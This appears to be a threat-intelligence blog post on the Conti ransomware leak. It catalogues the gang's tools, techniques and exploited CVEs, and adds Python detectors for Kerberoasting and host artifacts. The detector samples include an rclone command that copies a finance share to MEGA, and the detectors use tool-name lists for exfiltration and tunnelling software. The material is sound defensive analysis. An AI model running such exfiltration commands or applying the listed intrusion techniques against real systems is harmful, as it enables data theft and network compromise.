Conti Leaks: Tools and Techniques


r00t | ransomware, conti, threat-intelligence, leaks

Following the Russian invasion of Ukraine, various cyber gangs publicly declared allegiances. A Conti ransomware group member leaked substantial data including operational tools, training documentation, and internal communications. The dataset, shared with security researchers and @vxunderground, contained nearly two years of chat logs beginning January 2021.

Evidence suggests Conti is either a successor to Ryuk ransomware or shares operators with it. Analysis of leaked Bitcoin addresses indicates the group accumulated approximately 65,498 BTC (~$2.88 billion USD at $44k per coin) between April 21, 2021, and February 28, 2022.

Tools & Techniques: Conti’s “FastGuide”

The leaked materials revealed the organization’s systematic approach to enterprise compromise, privilege escalation, lateral movement, and persistence establishment.

Active Directory & Reconnaissance

  • Adfind.exe: Command-line Active Directory query tool
  • Rubeus: Kerberos interaction and exploitation toolset
  • Invoke-Kerberoast.ps1: Requests service tickets for SPN-bearing accounts so their hashes can be cracked offline (Kerberoasting)
  • SharpChromium: Extracts browser data from Chrome and Edge
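The Kerberoasting step (Invoke-Kerberoast.ps1, Rubeus) leaves a distinctive trace on the domain controller: a burst of Security event 4769 ticket requests with RC4 encryption (type 0x17) for many different service accounts from one user and one source address. The detector below is an added illustration for this write-up, not part of the leaked toolkit or of the original article; the event dicts are constructed to mirror the 4769 XML fields, and the threshold and time window are assumptions to tune per environment.

```python
"""Detect Kerberoasting bursts in Windows Security 4769 (TGS request) events.

Added example for this write-up, not a tool from the Conti leak. The
events below are constructed to mirror the 4769 XML fields; a real
pipeline would feed the same dicts from a SIEM export.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17        # TicketEncryptionType that Invoke-Kerberoast / Rubeus request
THRESHOLD = 5          # distinct SPN accounts from one (user, source IP) per window
WINDOW = timedelta(minutes=5)


def detect_kerberoast(events, threshold=THRESHOLD, window=WINDOW):
    """Return {(user, ip): [spn accounts]} for bursts of RC4 service-ticket requests.

    Machine accounts (name ends in '$') and krbtgt are skipped: their
    passwords are random and rotated, so tickets for them are not worth
    cracking and would only add noise.
    """
    requests = defaultdict(list)
    for ev in events:
        if ev.get("EventID") != 4769:
            continue
        if int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        svc = ev["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        key = (ev["TargetUserName"], ev["IpAddress"])
        requests[key].append((datetime.fromisoformat(ev["TimeCreated"]), svc))

    hits = {}
    for key, reqs in requests.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):          # sliding window over request times
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            spns = {svc for _, svc in reqs[start:end + 1]}
            # keep the largest distinct-SPN set seen inside any one window
            if len(spns) >= threshold and len(spns) > len(hits.get(key, [])):
                hits[key] = sorted(spns)
    return hits


def _ev(ts, user, ip, svc, etype="0x17"):
    return {"EventID": 4769, "TimeCreated": ts, "TargetUserName": user,
            "IpAddress": ip, "ServiceName": svc, "TicketEncryptionType": etype}


# Constructed sample: one user pulls six RC4 tickets in 40 seconds (roast),
# another gets one RC4 ticket for a legacy service (normal), a third requests
# many AES (0x12) tickets (normal), plus machine-account and krbtgt noise.
SAMPLE_EVENTS = [
    _ev("2022-02-20T09:00:00", "jdoe", "10.0.0.25", "svc_sql"),
    _ev("2022-02-20T09:00:05", "jdoe", "10.0.0.25", "svc_backup"),
    _ev("2022-02-20T09:00:10", "jdoe", "10.0.0.25", "svc_web"),
    _ev("2022-02-20T09:00:20", "jdoe", "10.0.0.25", "svc_sccm"),
    _ev("2022-02-20T09:00:30", "jdoe", "10.0.0.25", "svc_exchange"),
    _ev("2022-02-20T09:00:40", "jdoe", "10.0.0.25", "svc_sharepoint"),
    _ev("2022-02-20T09:00:41", "jdoe", "10.0.0.25", "FS01$"),
    _ev("2022-02-20T09:00:42", "jdoe", "10.0.0.25", "krbtgt"),
    _ev("2022-02-20T09:01:00", "asmith", "10.0.0.31", "svc_legacy"),
    *[_ev(f"2022-02-20T09:02:{i:02d}", "bng", "10.0.0.40", f"svc_{i}", "0x12")
      for i in range(8)],
]

if __name__ == "__main__":
    for (user, ip), spns in detect_kerberoast(SAMPLE_EVENTS).items():
        print(f"possible Kerberoast: {user}@{ip} requested {len(spns)} SPNs: {spns}")
```

A single RC4 request is common wherever a legacy service still lacks AES keys, which is why the rule counts distinct service accounts per source rather than alerting on encryption type alone; in an AES-only domain the threshold can be dropped to 1.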

System Enumeration

  • Veil PowerTools: PowerShell offensive collections
  • Seatbelt.exe: Security-focused host survey utility
  • Net-GPPPassword: Recovers credentials stored in Group Policy Preferences (cpassword) in SYSVOL
  • ShareFinder.ps1: Admin share discovery
  • Invoke-SMBAutoBrute.ps1: Domain account brute forcing
  • NtdsAudit: Active Directory database auditing
  • SharpView: .NET PowerView implementation

Data Exfiltration Methods

  • Microsoft Exchange mailbox export
  • Rclone cloud synchronization
  • FileZilla FTP transfers
  • MEGA cloud storage

Remote Access Infrastructure

  • Ngrok tunnel deployment
  • Ngrok service installation via NSSM
  • AnyDesk remote desktop

Additional Tools

  • WinPwn: PowerShell reconnaissance and exploitation
  • PEASS-ng: Privilege escalation framework
  • dazzleUP: Misconfiguration detection
  • Watson: KB vulnerability enumeration
  • Responder: LLMNR/NBT-NS poisoning
  • SharpHound/BloodHound: Attack path analysis
  • Mimikatz: Credential extraction techniques

Operational Procedures

  • RDP port modification for concealment
  • LSASS dumping without Mimikatz
  • Event log deletion and sanitization
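The procedures above, together with the exfiltration tooling (Rclone, MEGA, FileZilla) and the remote-access setup (Ngrok as an NSSM service, AnyDesk) listed earlier, each leave a recognisable host artifact: a Sysmon registry write to the RDP-Tcp PortNumber value, a non-system process opening lsass.exe, Security 1102 / System 104 log-clear events, a System 7045 service install whose binary is nssm.exe or ngrok, and process creation of the exfil binaries. The triage script below is an added example, not Conti's code or a vendor rule; the event dicts are constructed, and the LSASS allowlist and tool-name sets are assumptions to tune per estate.

```python
"""Host detections for the Conti operational procedures listed above.

Added example for this write-up, not a Conti tool or a rule shipped by
any vendor. Events are constructed dicts keyed like the Sysmon / Windows
event XML fields (EventID, Channel, Image, TargetObject, ...); a real
pipeline would feed the same dicts from winlogbeat or a SIEM export.
"""
import ntpath

SYSMON = "Microsoft-Windows-Sysmon/Operational"
RDP_PORT_VALUE = r"\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
RDP_DEFAULT = "0x00000d3d"       # 3389 as Sysmon renders the DWORD in Details
# Processes expected to open LSASS (Windows internals, AV). Assumed list, tune
# per estate; anything else touching lsass.exe is a dump candidate (procdump,
# rundll32 comsvcs.dll, Task Manager, ...).
LSASS_ALLOWED = {"csrss.exe", "wininit.exe", "services.exe", "lsm.exe",
                 "msmpeng.exe", "svchost.exe"}
REMOTE_ACCESS_TOOLS = {"ngrok.exe", "nssm.exe", "anydesk.exe"}
EXFIL_TOOLS = {"rclone.exe", "filezilla.exe", "megasync.exe", "megacmd.exe"}


def _base(path):
    return ntpath.basename(path or "").lower()


def triage(events):
    """Return [(rule, host, detail)] for every event that matches a rule."""
    hits = []
    for ev in events:
        eid, chan, host = ev.get("EventID"), ev.get("Channel"), ev.get("Computer", "?")
        if chan == SYSMON:
            if eid == 13 and ev.get("TargetObject", "").endswith(RDP_PORT_VALUE):
                details = ev.get("Details", "")
                if RDP_DEFAULT not in details.lower():
                    hits.append(("rdp_port_changed", host, details))
            elif eid == 10 and _base(ev.get("TargetImage")) == "lsass.exe":
                src = _base(ev.get("SourceImage"))
                if src not in LSASS_ALLOWED:
                    hits.append(("lsass_access", host,
                                 f"{src} GrantedAccess={ev.get('GrantedAccess')}"))
            elif eid == 1:
                img = _base(ev.get("Image"))
                if img in EXFIL_TOOLS:
                    hits.append(("exfil_tool", host, ev.get("CommandLine", img)))
                elif img in REMOTE_ACCESS_TOOLS:
                    hits.append(("remote_access_tool", host, ev.get("CommandLine", img)))
        elif chan == "Security" and eid == 1102:
            hits.append(("log_cleared", host,
                         f"Security log cleared by {ev.get('SubjectUserName')}"))
        elif chan == "System" and eid == 104:
            hits.append(("log_cleared", host, "event log cleared (System 104)"))
        elif chan == "System" and eid == 7045:
            # NSSM registers itself as the service binary and keeps the real
            # target (e.g. ngrok) under the service's Parameters key, so match
            # the wrapper as well as ngrok itself.
            path = ev.get("ImagePath", "")
            if any(t in path.lower() for t in ("nssm", "ngrok")):
                hits.append(("tunnel_service_installed", host,
                             f"{ev.get('ServiceName')}: {path}"))
    return hits


# Constructed sample telemetry: one event per technique plus two benign events.
SAMPLE_EVENTS = [
    {"Channel": SYSMON, "EventID": 13, "Computer": "WS01",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Terminal Server"
                     r"\WinStations\RDP-Tcp\PortNumber",
     "Details": "DWORD (0x0000c001)"},                        # RDP moved to 49153
    {"Channel": SYSMON, "EventID": 10, "Computer": "WS01",
     "SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"Channel": SYSMON, "EventID": 10, "Computer": "WS01",   # benign
     "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"Channel": "System", "EventID": 7045, "Computer": "WS01",
     "ServiceName": "ngrok", "ImagePath": r"C:\ProgramData\nssm.exe"},
    {"Channel": SYSMON, "EventID": 1, "Computer": "FS01",
     "Image": r"C:\Users\Public\rclone.exe",
     "CommandLine": r"rclone.exe copy \\FS01\finance mega:backup -q"},
    {"Channel": "Security", "EventID": 1102, "Computer": "DC01",
     "SubjectUserName": "admin"},
    {"Channel": SYSMON, "EventID": 1, "Computer": "WS02",   # benign
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for rule, host, detail in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {host}: {detail}")
```

Matching on binary names is the weakest of these rules, since the operator can rename rclone.exe; the LSASS, registry and service-install signals survive renaming because they key on the target object rather than the attacker's file name.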

Targeted Vulnerabilities

The group exploited multiple critical CVEs:

Privilege Escalation & Domain Compromise

  • CVE-2020-1472 (Zerologon)
  • CVE-2020-17049 (Kerberos "Bronze Bit" KDC security feature bypass)
  • CVE-2021-36934 (HiveNightmare)
  • CVE-2021-36942 (PetitPotam)

Remote Code Execution

  • CVE-2019-0708 (BlueKeep)
  • CVE-2020-0796 (SMBGhost)
  • CVE-2021-34473 (ProxyShell: Exchange pre-auth path confusion)
  • CVE-2021-31207 (ProxyShell: Exchange post-auth arbitrary file write)
  • CVE-2021-34523 (ProxyShell: Exchange PowerShell backend privilege elevation)

EternalBlue Suite (MS17-010 SMBv1 flaws)

  • CVE-2017-0143
  • CVE-2017-0144 (EternalBlue)
  • CVE-2017-0145
  • CVE-2017-0146
  • CVE-2017-0148

Defensive Recommendations

Organizations should implement:

  • User awareness and phishing training
  • Consistent patch management processes
  • Modern endpoint detection and response (EDR) solutions
  • Vulnerability management and attack surface reduction
  • Security information and event management (SIEM)
  • Backups isolated from the production domain (offline or immutable copies, with access granted on Zero Trust principles)
  • Penetration testing programs

Leaked Data Artifacts

The leaked dataset was distributed as the following archives; SHA256 hashes were published alongside the originals so that recipients could verify their copies:

  • Chat Logs 2020.7z
  • Documentation Leak.7z
  • Internal Software Leak.7z
  • Jabber Chat Logs 2021-2022.7z
  • Locker Leak.7z
  • Pony Leak 2016.7z
  • Rocket Chat Leaks.7z
  • Screenshots December 2021.7z
  • Toolkit Leak.7z
  • Trickbot Forum Leak.7z
  • Trickbot Leaks.7z